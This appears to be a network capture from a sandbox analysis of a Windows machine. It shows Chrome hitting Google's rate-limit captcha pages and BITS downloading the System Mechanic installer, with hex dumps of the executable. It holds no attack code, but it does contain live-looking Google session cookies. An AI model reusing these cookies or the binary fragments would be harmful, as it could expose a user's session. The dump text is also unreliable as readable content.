2024-04-27 00:20:16 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMCJsbEGIjDQUM1XksqiVK7TvDJ-VWO8_5g4InGTtoS9EM--2kh8-SXh1FoYbI9aSPEi5GAatgQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIwImxsQYQ_avLhAMSBJoQwLk Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Sat, 27 Apr 2024 00:20:16 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-27-00; expires=Mon, 27-May-2024 00:20:16 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=nlJq8NksY3fw5JjqePju25SB4Ei052Ou-_BYpqCCmn5cqs1f7XdItZC5M5e-NHwxW8MHKmNIQq2CnKFtMN_ebrB1BwDEg6kASn0UsYT9aGECdJ6CQ0wzQfDYJstMC0Kt6w1U5xw-pQAMPux27C__0M0wEogYWQpCfaKnIaXXWG4; expires=Sun, 27-Oct-2024 00:20:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 00:20:16 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49754	142.251.32.100	443	5268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:20:17 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMCJsbEGIjDQUM1XksqiVK7TvDJ-VWO8_5g4InGTtoS9EM--2kh8-SXh1FoYbI9aSPEi5GAatgQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-27-00; NID=513=nlJq8NksY3fw5JjqePju25SB4Ei052Ou-_BYpqCCmn5cqs1f7XdItZC5M5e-NHwxW8MHKmNIQq2CnKFtMN_ebrB1BwDEg6kASn0UsYT9aGECdJ6CQ0wzQfDYJstMC0Kt6w1U5xw-pQAMPux27C__0M0wEogYWQpCfaKnIaXXWG4
2024-04-27 00:20:17 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sat, 27 Apr 2024 00:20:17 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3113 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 00:20:17 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-27 00:20:17 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 42 44 79 70 46 6b 74 59 62 6b 47 53 59 72 37 61 31 79 49 4c 53 73 45 71 42 6a 34 4f 4a 4a 42 63 77 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="BDypFktYbkGSYr7a1yILSsEqBj4OJJBcw
2024-04-27 00:20:17 UTC	959	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49755	142.251.32.100	443	5268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:20:17 UTC	912	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMCJsbEGIjAHBiCBZ-8IAykP8bXpVLKe0gHlM-R2QwNJoGYdPTBn5xWSyLCRRyfLdQ2qWbDO2CMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-27-00; NID=513=c4eeLLbbUjrdVmY_3J67bVqlRrcId_Uly38Ob6hofqA06jqIxHd5LWwDDb_r2n_PI-Nq7d4rl0LqmARVgn0EQZL3iurYGIl8JRK4ijq2lCBIDoh_Xo7ipkby0KBmt1nHFR-uf5Pr1tzPsHyswZ_A9PXlsQ1zkKv12A3Y2VM9JHs
2024-04-27 00:20:17 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Sat, 27 Apr 2024 00:20:17 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3185 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-27 00:20:17 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-04-27 00:20:17 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 39 41 41 56 66 35 66 68 33 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="9AAVf5fh3
2024-04-27 00:20:17 UTC	1031	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49761	169.150.236.99	443

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:20:50 UTC	211	OUT	HEAD /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: download.iolo.net
2024-04-27 00:20:51 UTC	639	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 00:20:51 GMT Content-Type: application/octet-stream Content-Length: 59721128 Connection: close Server: BunnyCDN-IL1-1069 CDN-PullZone: 1654350 CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028 CDN-RequestCountryCode: US Cache-Control: public, max-age=259200 Last-Modified: Tue, 19 Mar 2024 23:10:10 GMT CDN-StorageServer: LA-356 CDN-FileServer: 775 CDN-ProxyVer: 1.04 CDN-RequestPullSuccess: True CDN-RequestPullCode: 206 CDN-CachedAt: 04/17/2024 19:42:45 CDN-EdgeStorageId: 1070 CDN-Status: 200 CDN-RequestId: 1eb986a62ffcf839ceda8f1818eafba7 CDN-Cache: HIT Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49763	169.150.236.99	443

Timestamp	Bytes transferred	Direction	Data
2024-04-27 00:20:51 UTC	262	OUT	GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMT User-Agent: Microsoft BITS/7.8 Host: download.iolo.net
2024-04-27 00:20:51 UTC	639	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 00:20:51 GMT Content-Type: application/octet-stream Content-Length: 59721128 Connection: close Server: BunnyCDN-IL1-1069 CDN-PullZone: 1654350 CDN-Uid: 5b8ea5d8-68d6-4057-a57d-a5f315142028 CDN-RequestCountryCode: US Cache-Control: public, max-age=259200 Last-Modified: Tue, 19 Mar 2024 23:10:10 GMT CDN-StorageServer: LA-356 CDN-FileServer: 775 CDN-ProxyVer: 1.04 CDN-RequestPullSuccess: True CDN-RequestPullCode: 206 CDN-CachedAt: 04/17/2024 19:42:45 CDN-EdgeStorageId: 1070 CDN-Status: 200 CDN-RequestId: 96681bd5bdb33b4d25a37ccc405b5d22 CDN-Cache: HIT Accept-Ranges: bytes
2024-04-27 00:20:51 UTC	15745	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 20 3b ec 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 c4 8a 03 00 56 04 00 00 00 00 00 fa e2 8a 03 00 20 00 00 00 00 8b 03 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 8f 03 00 02 00 00 54 70 8f 03 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL ;"0V @ Tp`
2024-04-27 00:20:51 UTC	23	IN	Data Raw: 16 1f 0a 16 28 4d 00 00 06 08 28 27 00 00 0a 2d 33 11 15 2d 03 14 2b Data Ascii: (M('-3-+
2024-04-27 00:20:51 UTC	16384	IN	Data Raw: 18 11 15 72 b1 10 00 70 28 3b 00 00 0a 25 2d 04 26 14 2b 05 6f 1e 00 00 0a 28 27 00 00 0a 2c 0d 11 15 72 b1 10 00 70 08 6f e9 00 00 0a 09 28 27 00 00 0a 2d 33 11 15 2d 03 14 2b 18 11 15 72 22 29 00 70 28 3b 00 00 0a 25 2d 04 26 14 2b 05 6f 1e 00 00 0a 28 27 00 00 0a 2c 0d 11 15 72 22 29 00 70 09 6f e9 00 00 0a 11 04 28 27 00 00 0a 2d 34 11 15 2d 03 14 2b 18 11 15 72 83 0a 00 70 28 3b 00 00 0a 25 2d 04 26 14 2b 05 6f 1e 00 00 0a 28 27 00 00 0a 2c 0e 11 15 72 83 0a 00 70 11 04 6f e9 00 00 0a 11 05 28 27 00 00 0a 2d 34 11 15 2d 03 14 2b 18 11 15 72 a9 10 00 70 28 3b 00 00 0a 25 2d 04 26 14 2b 05 6f 1e 00 00 0a 28 27 00 00 0a 2c 0e 11 15 72 a9 10 00 70 11 05 6f e9 00 00 0a 11 06 28 27 00 00 0a 2d 34 11 15 2d 03 14 2b 18 11 15 72 b9 10 00 70 28 3b 00 00 0a 25 Data Ascii: rp(;%-&+o(',rpo('-3-+r")p(;%-&+o(',r")po('-4-+rp(;%-&+o(',rpo('-4-+rp(;%-&+o(',rpo('-4-+rp(;%
2024-04-27 00:20:51 UTC	16384	IN	Data Raw: 0a 0a 28 3e 01 00 0a 6f 3f 01 00 0a 0b 06 72 90 5a 00 70 28 2a 00 00 0a 0c 08 28 ac 00 00 0a 2c 06 08 28 a3 00 00 0a 07 08 1b 6f bb 01 00 0a 2d 1a 06 28 ab 00 00 0a 26 07 08 28 ef 00 00 0a 08 03 28 6f 00 00 06 26 17 0d de 07 de 03 26 de 00 16 2a 09 2a 01 10 00 00 00 00 00 00 5d 5d 00 03 1c 00 00 01 7e 28 4c 00 00 0a 28 1b 00 00 0a 6f 1c 00 00 0a 6f 1d 00 00 0a 6f 1e 00 00 0a 6f bc 01 00 0a 2a 1b 30 06 00 12 01 00 00 38 00 00 11 04 6f bd 01 00 0a 0a 28 5f 00 00 0a 06 14 14 6f 60 00 00 0a 72 11 00 00 70 0b 7e 0a 00 00 04 28 ac 00 00 0a 2c 5f 7e 0a 00 00 04 28 fe 00 00 0a 73 be 01 00 0a 0c 08 6f 06 01 00 0a 0d 09 6f a9 00 00 0a 20 00 04 00 00 31 2d 09 09 6f a9 00 00 0a 20 00 04 00 00 59 6f bf 01 00 0a 1f 0a 6f c0 01 00 0a 13 04 09 09 6f a9 00 00 0a 11 04 59 Data Ascii: (>o?rZp((,(o-(&((o&&]]~(L(oooo08o(_o`rp~(,_~(soo 1-o YoooY
2024-04-27 00:20:51 UTC	16384	IN	Data Raw: 65 46 72 6f 6d 43 4c 53 49 44 00 55 6e 69 6e 73 74 61 6c 6c 47 55 49 44 00 61 42 72 61 6e 64 49 44 00 61 50 72 6f 64 49 44 00 67 65 74 5f 45 43 6f 6d 6d 49 44 00 67 65 74 5f 45 63 6f 6d 6d 49 44 00 73 65 74 5f 45 63 6f 6d 6d 49 44 00 61 45 63 6f 6d 6d 49 44 00 70 72 6f 63 65 73 73 49 44 00 67 65 74 5f 50 72 6f 64 75 63 74 49 44 00 73 65 74 5f 50 72 6f 64 75 63 74 49 44 00 45 45 43 49 00 67 65 74 5f 41 53 43 49 49 00 45 50 49 00 49 6e 73 74 61 6c 6c 65 72 53 4d 55 44 55 49 00 49 6e 69 74 69 61 6c 69 7a 65 47 55 49 00 49 6e 69 74 69 61 6c 69 7a 65 55 49 00 67 65 74 5f 49 6e 73 74 61 6c 6c 65 72 55 49 00 45 41 4b 00 41 75 64 69 74 46 69 6c 65 50 61 74 68 54 6f 58 4d 4c 00 69 6e 76 6f 6b 65 5f 43 6c 65 61 6e 75 70 5f 61 75 64 69 74 46 69 6c 65 70 61 74 68 54 Data Ascii: eFromCLSIDUninstallGUIDaBrandIDaProdIDget_ECommIDget_EcommIDset_EcommIDaEcommIDprocessIDget_ProductIDset_ProductIDEECIget_ASCIIEPIInstallerSMUDUIInitializeGUIInitializeUIget_InstallerUIEAKAuditFilePathToXMLinvoke_Cleanup_auditFilepathT
2024-04-27 00:20:51 UTC	16384	IN	Data Raw: 6c 00 20 00 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 50 00 72 00 6f 00 63 00 65 00 65 00 64 00 2c 00 20 00 54 00 68 00 69 00 73 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 4f 00 66 00 20 00 54 00 68 00 65 00 20 00 41 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 20 00 49 00 73 00 20 00 41 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 49 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 65 00 64 00 00 2f 53 00 69 00 6c 00 65 00 6e 00 74 00 20 00 49 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 20 00 43 00 6f 00 6d 00 70 00 6c 00 65 00 74 00 65 00 00 71 49 00 4e 00 53 00 54 00 41 00 4c 00 4c 00 20 00 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 50 00 72 00 6f 00 63 00 65 00 65 00 64 00 2c 00 20 00 41 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 Data Ascii: l Cannot Proceed, This Version Of The Application Is Already Installed/Silent Install CompleteqINSTALL Cannot Proceed, Applicati
2024-04-27 00:20:51 UTC	16384	IN	Data Raw: 00 61 00 63 00 79 00 47 00 75 00 61 00 72 00 64 00 69 00 61 00 6e 00 22 00 20 00 2f 00 44 00 49 00 53 00 41 00 42 00 4c 00 45 00 01 80 87 2f 00 63 00 68 00 61 00 6e 00 67 00 65 00 20 00 2f 00 74 00 6e 00 20 00 22 00 5c 00 69 00 6f 00 6c 00 6f 00 20 00 74 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 69 00 65 00 73 00 5c 00 41 00 63 00 74 00 69 00 76 00 65 00 53 00 79 00 6e 00 63 00 2d 00 53 00 79 00 73 00 74 00 65 00 6d 00 4d 00 65 00 63 00 68 00 61 00 6e 00 69 00 63 00 22 00 20 00 2f 00 44 00 49 00 53 00 41 00 42 00 4c 00 45 00 01 6f 2f 00 63 00 68 00 61 00 6e 00 67 00 65 00 20 00 2f 00 74 00 6e 00 20 00 22 00 5c 00 69 00 6f 00 6c 00 6f 00 20 00 74 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 69 00 65 00 73 00 5c 00 69 00 6f 00 6c 00 6f 00 41 Data Ascii: acyGuardian" /DISABLE/change /tn "\iolo technologies\ActiveSync-SystemMechanic" /DISABLEo/change /tn "\iolo technologies\ioloA
2024-04-27 00:20:51 UTC	16384	IN	Data Raw: 24 df 9e fc 42 bd 90 5a b0 ba 82 d1 89 d7 6a 07 8d 7d 7a 7d 51 7b 3e ed 95 f5 59 fa 50 97 b1 4c 7e 75 7d 16 d9 50 b5 83 62 9f 51 99 9e 5e 24 9f 5d 7e 81 90 9e 32 2c 5e 5f 4f 29 16 e3 a2 f6 ee b7 d7 ab cf ea e8 ad da 83 ba be 5a 47 65 7d a3 45 87 da f3 69 1f 83 41 04 00 8d 7d 66 2b 83 9e 11 53 7b fe ed 59 fa 55 d6 d1 aa cf 6a 0f 50 b4 29 60 b4 ea 50 b9 77 ca 75 23 00 3b 2b 03 b5 f7 4e 7b 96 7e f5 fa 87 49 3b 75 7d b3 fe a8 dc bb e5 9a 11 80 d9 4a 62 66 74 d4 5e 6c 7b 96 7e f5 0c c4 48 ae 91 71 29 a1 f2 ca 29 0f 69 55 d0 33 2a 2a f7 76 b9 95 76 5a 06 62 b5 5f 3b 8e 85 ca bd 55 ae f9 24 20 e5 2b 33 6f b5 9e 5e 6a 56 5f e4 18 29 ef 6c 5e 62 35 0a 4a 2b 33 cd 4c 9c 08 a9 2e 8a 9a 29 53 50 2f cb a8 69 6c 44 38 12 41 55 38 0c b9 b6 16 00 50 3b 30 00 00 a8 ee ef Data Ascii: $BZj}z}Q{>YPL~u}PbQ^$]~2,^_O)ZGe}EiA}f+S{YUjP)`Pwu#;+N{~I;u}Jbft^l{~Hq))iU3**vvZb_;U$ +3o^jV_)l^b5J+3L.)SP/ilD8AU8P;0
